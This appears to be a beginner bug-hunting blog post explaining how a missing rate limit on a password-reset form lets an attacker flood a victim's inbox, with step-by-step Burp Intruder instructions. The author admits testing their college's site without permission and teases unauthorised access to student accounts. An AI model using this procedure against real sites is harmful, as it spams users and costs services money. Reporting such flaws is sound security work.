The Easiest Bug to Start Your Bug Hunting Journey.
What if one fine day, while enjoying a movie on your mobile, you suddenly find yourself bombarded with enormous email notifications regarding new password reset links being requested, even though you didn’t initiate any password reset? Wouldn’t that be annoying? And what if this continues to happen repeatedly on a daily basis? Sounds quite annoying and also somewhat terrific, doesn’t it? Let’s explore how this can occur!
What is the impact of such a vulnerability?
- If an organization is using an Email Service Software API or some tool that incurs costs for their emails, this type of attack can result in financial losses for the organization.
- It can also slow down services and consume a significant amount of storage in the sent mail.
- Users affected by this vulnerability, due to mass password resets to a single email or phone number, may become annoyed, leading to potential customer dissatisfaction and a risk to the business if customers choose to stop using the services.
A little bit about Rate Limit:
A rate limiting algorithm is used to check if the user session (or IP-address) has to be limited based on the information in the session cache. In case a client made too many requests within a given time frame, HTTP-Servers can respond with status code 429: Too Many Requests.
A little bit about Burp:
“Burp” is a proxy-based tool used to evaluate the security of web-based applications and do hands-on testing.
How to exploit?
Let us assume that the website is www.justexample.com.
- On the main login page of the website, there will be forget password option, click on forget password on that login page.
2. Enter the name, Email and phone no. of the user whose password had to be changed and don’t click on verify button now.
3. Fill the mandatory details for requesting the password reset link.
4. Start Capturing the request in the Burp and then click on ‘VERIFY’ on the FORGET PASSWORD page of www.justexample.com and then once click on ‘Forward Button’ on the ‘Proxy Tab’ in the Burp Tool.
5. Now send that Forwarded Request from Proxy to Intruder Tab.
6. In the intruder, Repeat the request 100 Times by Fixing Any Arbitrary Payload Which Does No Effect to Request. I choose:
Accept-Language: en-US,en;q=0.§9§
7. We run an iteration of numbers since rate limit is not there.
8. We get a ‘200 OK’ status code for all the request and 100+ new Password reset link in victim’s inbox.
9. As we can see my email got flooded with 100+ password reset link.
What is the impact of such a vulnerability?
Since I’ve discovered the vulnerability on my college website, I neither received any bounty nor recognition. Stay tuned for the next writeup to learn how I was able to log into my college’s students’ accounts without them being aware of it. Subsequently, I was warned not to exploit any vulnerabilities in the system again. :)
Thanks for reading. If you have any questions feel free to let me know.
